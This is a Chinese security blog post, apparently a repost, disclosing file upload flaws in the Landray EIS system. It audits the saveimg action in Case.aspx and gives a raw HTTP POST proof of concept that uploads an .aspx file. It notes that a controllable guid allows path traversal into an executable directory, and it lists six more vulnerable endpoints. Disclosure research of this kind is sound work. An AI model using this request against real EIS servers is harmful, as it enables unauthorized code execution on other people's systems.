文章总结： 本文披露蓝凌EIS系统多个后台文件上传0day。审计发现Case.aspx等接口saveimg未校验文件后缀，且guid参数可控致路径穿越，攻击者可上传.aspx恶意脚本至可解析目录执行代码。建议立即修补或限制接口访问。 综合评分： 93 文章分类： 代码审计,漏洞分析,漏洞POC,WEB安全

[代码审计]蓝凌EIS存在多个后台文件上传0day

原创

静师傅

安静安全

2026年1月2日 13:40 广东

点击蓝色字体关注我们

静师傅的爱情论:

真正的成熟不是避免冲突维持不吵架的和谐，而是在碰撞中加深理解，修复裂痕(如果两个人都很强势，大概率爱情的苦)。以及，克制点火的情绪这点非常难做得到。怎么说呢，到了后来，大部分人的爱情由感性变得更多的是理性思考，相反感性则不需要逻辑是冲动直接的。爱情不是人生的全部，不要对方让自己的磁场变得非常不稳定！

审计分析

不知什么排版

位于/eis/service/Case.aspx，action选saveimg，跟进PictureSave()分析

1.上传的文件参数名为”file”（通过base.Request.Files[“file”]获取）

2.上传的文件名进行了简单的处理：替换了”&”，并检查了文件名是否为空（如果为空则添加”eis”前缀）。

3.文件扩展名来自原始文件的扩展名（Path.GetExtension(httpPostedFile.FileName)），没有进行任何过滤。

4.文件被保存到服务器上的路径为：/files/302/{guid}/，其中guid由请求参数”guid”提供，也就是访问上传路径为/files/302/{guid}/test.aspx

5.同时，文件数据也被存入数据库的OA_DOC_FILE_INFO表中（通过存储过程SP_OA_DOC_FILE_INFO）。

POC:

POST /eis/service/Case.aspx?action=saveimg HTTP/1.1Host: IP:PORTContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1234567890Content-Length: 588
------WebKitFormBoundary1234567890Content-Disposition: form-data; name="file"; filename="test.aspx"Content-Type: text/html
test------WebKitFormBoundary1234567890Content-Disposition: form-data; name="guid"
5e1dac07-7ec4-4094-af96-7aa731a78916或者构造路径遍历(../../editor_img传到这里)------WebKitFormBoundary1234567890--

/eis/service/Culture.aspx?action=saveimg

和Case的代码一样,文件被保存到服务器上的路径变为：/files/404/{guid}/test.aspx

/eis/service/Docs.aspx?action=saveimg

和Case的代码一样,被保存到服务器上的路径变为：/files/301/{guid}/test.aspx

以及:

/eis/service/Institution.aspx?action=saveimg

/eis/service/News.aspx?action=saveimg

/eis/service/Notice.aspx?action=saveimg

/eis/service/Summary.aspx?action=saveimg

由于guid可控，通过../上传到可解析目录即可

相关阅读

[零日全网首发!]腾达路由器命令注入

[安全研究篇]关于微软powershell零日漏洞的POC

[代码审计-新0day]华天动力OA存在多个SQL注入漏洞

喜欢请点个赞呀~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅《[代码审计]蓝凌EIS存在多个后台文件上传0day》